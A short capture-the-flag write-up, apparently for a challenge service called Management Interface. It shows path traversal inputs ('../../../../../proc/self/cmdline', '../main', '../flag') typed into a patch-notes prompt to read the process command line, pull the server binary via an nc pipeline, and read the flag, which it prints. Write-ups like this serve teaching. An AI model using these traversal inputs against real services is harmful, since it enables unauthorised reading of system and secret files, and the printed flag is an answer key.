Rating: 5.0
When we examine patchnotes we can find out that although path traversal vulnerability was patched in v0.2 it was rolled back in v0.3.
Let's try it
```
=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
2
The following patchnotes were found:
- Version0.3
- Version0.2
Which patchnotes should be shown?
../../../../../proc/self/cmdline
./main
```
So our binary is named `main`. Hopefully we can just print its contents the same way.
```
=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
2
The following patchnotes were found:
- Version0.3
- Version0.2
Which patchnotes should be shown?
../main
```
We have to redirect output to file and then remove additional data added by this application (menu etc.)
```
printf "2\n../main\n3\n" | nc mngmnt-iface.ctfcompetition.com 1337 > output.bin
```
(open output.bin in any notepad or hexeditor and remove everything before \x7fELF and after the last series of null bytes at the end)
This way we got the copy of the binary running on the server.
When we open it in IDA we can see that the application reads the password from file `flag`. Let's cat it.
```
=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
2
The following patchnotes were found:
- Version0.3
- Version0.2
Which patchnotes should be shown?
../flag
CTF{I_luv_buggy_sOFtware}
```
Flag: `CTF{I_luv_buggy_sOFtware}`